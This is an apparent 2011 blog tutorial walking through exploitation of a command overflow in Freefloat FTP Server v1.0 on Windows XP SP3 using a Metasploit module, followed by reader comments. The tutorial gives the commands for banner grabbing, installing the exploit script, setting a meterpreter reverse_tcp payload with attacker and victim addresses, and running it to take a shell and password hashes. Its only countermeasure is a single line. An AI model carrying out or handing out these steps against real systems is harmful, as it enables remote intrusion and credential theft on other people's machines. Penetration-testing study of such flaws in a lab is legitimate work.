• 26,769
  • +1,026
  • 3,010
Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)

Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)

Bookmark

Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP 3

Victim Vulnerable Application : Freefloat FTP Server v1.0

Attacker O.S Backtrack 5 R1

Exploit Credit : Veerendra G.G SecPod Technologies (www.secpod.com)

Another vulnerable application that I found when surfing around from packet storm. In this tutorial also I will try to explain about the simple step by step how to perform an attack with a detailed way using metasploit framework.

Requirements :

1. Metasploit framework

2. freefloat_ftp_apee_cmd.rb exploit script (click here)

3. Freefloat FTP server v1.0 (download from mediafire.com)

Mediafire.com

Step By Step :

Attacker IP : 192.168.8.93

Victim IP : 192.168.8.91

1. The first step we need to perform some scanning method to know are someone in our network used this vulnerability software or not. Let say I already know that there's a computer have port 21(FTP) opened with IP 192.168.8.91. Then I want to know what software he/she used by performing a simple banner grabbing.

ftp 192.168.8.91

Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)

There it is ๐Ÿ˜› the vicitm use Freefloat FTP server.

2. Copy the freefloat_ftp_apee_cmd.rb to /pentest/exploits/framework/modules/exploits/remote/ folder.

cp freefloat_ftp_apee_cmd.rb /pentest/exploits/framework/modules/exploits/remote/

3. The next step let's prepare our metasploit console by running msfconsole command and then load the exploit.

msf > use exploit/remote/freefloat_ftp_apee_cmd
msf  exploit(freefloat_ftp_apee_cmd) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)

4. There's a few switch you need to set up when using this exploit(see picture below), but if you want to view the whole options, just run show options command.

Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)

Informations :

set rhost 192.168.8.91 --> set your target IP Address

set lhost 192.168.8.93 --> attacker computer IP address

set lport 443 --> port of your local computer used to handle the payload

5. Everything was set up so nice until this steps, the last step you need to run the exploit by using exploit command and see are it works or not.

Hacking Windows XP SP3 via Freefloat FTP Server Command Overflow Vulnerability(Zeroday)

PWNED!

We got the victim machine and also the password hash(click here to view how to crack the password hash). If you want to know more what meterpreter can do, you can view the tutorial here and here.

Countermeasure :

1. Until now when I write this tutorial (11-9-2011) there's still no cure, you can temporarily change to another FTP server application until the developer fix it up.

Hope it's useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • fatmir

    I can,t locate a /pentest/exploits/framework/modules/exploits/remote/ folder

    after pentest/exploits/ I have just framework2 and 3….can i put this script in framework 3?!

    • v4L

      #fatmir
      Yes you can put in your framework3 folder they have the same structure.